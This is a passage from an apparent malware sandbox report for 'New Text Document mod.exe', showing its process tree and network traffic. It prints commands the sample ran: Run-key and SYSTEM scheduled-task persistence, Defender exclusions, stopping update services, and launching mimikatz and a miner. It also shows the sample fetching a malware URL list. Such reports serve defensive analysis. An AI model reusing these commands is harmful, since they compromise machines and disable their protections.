        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        5⤵
        
        PID:3740
    - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        
        "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        
        PID:2656
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        6⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        7⤵
        Kills process with taskkill
        
        PID:9000
      - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        6⤵
        
        PID:7468
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        6⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        7⤵
        
        PID:6244
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        
        PID:9040
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7400
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        
        PID:8716
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5152
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        6⤵
        Power Settings
        
        PID:5408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        7⤵
        Power Settings
        
        PID:8784
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        7⤵
        Power Settings
        
        PID:4932
        
        C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        7⤵
        Power Settings
        
        PID:4448
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:5560
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:3696
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:6760
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:6364
  - - C:\Users\Admin\Desktop\a\cbot.exe
      "C:\Users\Admin\Desktop\a\cbot.exe"
      4⤵
      PID:5612
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:1352
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:3148
  - - C:\Users\Admin\Desktop\a\Client.exe
      "C:\Users\Admin\Desktop\a\Client.exe"
      4⤵
      PID:6708
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:5136
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:3664
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:6880
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:2176
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:3092
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:6856
  - - C:\Users\Admin\Desktop\a\mimikatz.exe
      "C:\Users\Admin\Desktop\a\mimikatz.exe"
      4⤵
      PID:7000
  - - C:\Users\Admin\Desktop\a\Client-built.exe
      "C:\Users\Admin\Desktop\a\Client-built.exe"
      4⤵
      PID:1548
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:3868
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:2968
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:1688
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:900
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:8492
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:5996
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2148 -parentBuildID 20240401114208 -prefsHandle 1728 -prefMapHandle 2112 -prefsLen 21258 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8404967a-912a-41e0-b297-b939cc545f81} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" gpu
      4⤵
      PID:8840
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 1724 -prefMapHandle 1720 -prefsLen 21258 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89d41042-0c1c-428f-bc18-63cb819e48b5} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" socket
      4⤵
      PID:6228
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3080 -childID 1 -isForBrowser -prefsHandle 2748 -prefMapHandle 1064 -prefsLen 21326 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ac1382c-6cf4-40f9-9037-996f89b72d0f} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:188
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2640 -childID 2 -isForBrowser -prefsHandle 3296 -prefMapHandle 3300 -prefsLen 22179 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af8477fa-bfc3-4e70-9eaa-7f4e5726eff2} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:5432
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5020 -parentBuildID 20240401114208 -prefsHandle 4740 -prefMapHandle 4120 -prefsLen 30178 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9046374-2277-49b4-a722-1e3707eeed51} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" rdd
      4⤵
      PID:9208
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5288 -prefMapHandle 5292 -prefsLen 30178 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fefba586-e768-46f1-8da8-d90792eddcf3} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" utility
      4⤵
      PID:8508
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 3 -isForBrowser -prefsHandle 5448 -prefMapHandle 5452 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2c909bc-ef52-4253-ae10-4f6420011791} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:5012
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 4 -isForBrowser -prefsHandle 5632 -prefMapHandle 5636 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d74b668-3815-42fe-b07c-64034c4f220a} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:1892
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5828 -childID 5 -isForBrowser -prefsHandle 5904 -prefMapHandle 5900 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2721b12a-ea90-4747-8571-27f4b3514d74} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:8464
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3584 -childID 6 -isForBrowser -prefsHandle 5880 -prefMapHandle 3076 -prefsLen 28631 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4dc9b57-2698-479c-8d9d-8387d4a75028} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:1020
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:1144
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:1984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:7776
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc6538cc40,0x7ffc6538cc4c,0x7ffc6538cc58
    3⤵
    PID:9204
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2180,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2176 /prefetch:2
    3⤵
    PID:4816
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2320 /prefetch:3
    3⤵
    PID:6600
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2116,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2432 /prefetch:8
    3⤵
    PID:7580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3204 /prefetch:1
    3⤵
    PID:5472
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3344 /prefetch:1
    3⤵
    PID:8048
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4536 /prefetch:1
    3⤵
    PID:3724
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4912,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4888 /prefetch:8
    3⤵
    PID:5656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4920,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4840 /prefetch:8
    3⤵
    PID:8176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4444,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4492 /prefetch:1
    3⤵
    PID:9152
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4872,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4788 /prefetch:1
    3⤵
    PID:5876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4056

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3532

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4352

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1424

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2364

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2280

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3316

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:572

C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
1⤵
PID:928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4684

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4236

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4340

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4120

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1576
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3808 -ip 3808
  2⤵
  PID:4000

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1920

C:\ProgramData\Screenshots\Lightshot.exe
C:\ProgramData\Screenshots\Lightshot.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6932
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:6956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5232
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1048
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4996
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3816
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2592
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2896
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:5124
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:5708
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5372
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5512
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5236
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5288
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:5296
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:5636
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:6388

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7152

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8008 -ip 8008
1⤵
PID:8912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9016 -ip 9016
1⤵
PID:8432

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:8656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8008 -ip 8008
1⤵
PID:8884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 8412 -ip 8412
1⤵
PID:9200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8568 -ip 8568
1⤵
PID:8032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6988 -ip 6988
1⤵
PID:4548

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:8344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6080

Network

DNS

64.159.190.20.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

64.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

30.243.111.52.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

30.243.111.52.in-addr.arpa

IN PTR

Response
DNS

checkappexec.microsoft.com

Dnscache

Remote address:

8.8.8.8:53

Request

checkappexec.microsoft.com

IN A

Response

checkappexec.microsoft.com

IN CNAME

prod-atm-wds-apprep.trafficmanager.net

prod-atm-wds-apprep.trafficmanager.net

IN CNAME

prod-agic-us-1.uksouth.cloudapp.azure.com

prod-agic-us-1.uksouth.cloudapp.azure.com

IN A

13.87.96.169
POST

https://checkappexec.microsoft.com/windows/shell/actions

smartscreen.exe

Remote address:

13.87.96.169:443

Request

POST /windows/shell/actions HTTP/2.0
host: checkappexec.microsoft.com
accept-encoding: gzip, deflate
user-agent: SmartScreen/2814751014982010
authorization: SmartScreenHash eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUiLCJoYXNoIjoiNzMyREMwRDhTRW89Iiwia2V5IjoiUUh3V0FXcmtjSGE2VmEzc1pjbFBvdz09In0=
content-length: 1161
content-type: application/json; charset=utf-8
cache-control: no-cache

Response

HTTP/2.0 200

date: Mon, 13 Jan 2025 17:40:19 GMT
content-type: application/json; charset=utf-8
content-length: 183
server: Kestrel
cache-control: max-age=0, private
request-context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
DNS

169.96.87.13.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

169.96.87.13.in-addr.arpa

IN PTR

Response
DNS

urlhaus.abuse.ch

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.2.49
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_New Text Document mod.exe

Remote address:

151.101.194.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 630255
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Mon, 13 Jan 2025 17:35:38 GMT
ETag: "99def-62b99df6853dc"
Cache-Control: max-age=300
Expires: Mon, 13 Jan 2025 17:41:55 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 17:40:21 GMT
Age: 206
X-Served-By: cache-fra-eddf8230087-FRA, cache-lcy-eglc8600091-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 314, 2
X-Timer: S1736790021.361951,VS0,VE0
Vary: Accept-Encoding
DNS

raw.githubusercontent.com

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133
GET

